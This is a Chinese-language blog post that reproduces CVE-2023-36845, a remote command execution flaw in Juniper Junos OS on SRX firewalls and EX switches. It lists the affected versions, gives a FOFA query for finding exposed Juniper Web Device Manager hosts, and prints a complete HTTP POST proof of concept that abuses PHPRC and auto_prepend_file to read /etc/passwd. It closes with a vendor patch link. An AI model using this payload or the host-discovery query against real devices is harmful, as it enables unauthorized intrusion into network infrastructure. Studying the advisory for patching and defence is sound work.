漏洞复现--Juniper Networks Junos OS EX远程命令执行漏洞(CVE-2023-36845)

免责声明:

文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行承担!

一:漏洞描述

Juniper Networks Junos OS EX是美国瞻博网络(Juniper Networks)公司的一套专用于该公司的硬件设备的网络操作系统。它存在一个 PHP 环境变量操纵漏洞,影响 Juniper SRX防火墙和EX交换机。 攻击者可未经授权进行远程命令执行。

二:漏洞影响版本

所有version < 21.4R3-S5
22.1version < 22.1R3-S4
22.2version < 22.2R3-S2
22.3version < 22.3R2-S2、22.3R3-S1
22.4version < 22.4R2-S1、22.4R3
23.2version < 23.2R1-S1、23.2R2

三:网络空间测绘查询

fofa:title="Juniper Web Device Manager"
漏洞复现--Juniper Networks Junos OS EX远程命令执行漏洞(CVE-2023-36845)_第1张图片
大多是国外的站

四:漏洞复现

poc:


POST /?PHPRC=/dev/fd/0 HTTP/1.1
Host: 127.0.0.1
Cache-Control: max-age=0
Sec-Ch-Ua: "-Not.A/Brand";v="8", "Chromium";v="102"
Sec-Ch-Ua-Mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9


auto_prepend_file="/etc/passwd"

漏洞复现--Juniper Networks Junos OS EX远程命令执行漏洞(CVE-2023-36845)_第2张图片
漏洞复现--Juniper Networks Junos OS EX远程命令执行漏洞(CVE-2023-36845)_第3张图片

五:修复建议

厂商已发布补丁:
https://supportportal.juniper.net/JSA72300

你可能感兴趣的:(漏洞复现,web安全,网络安全,安全)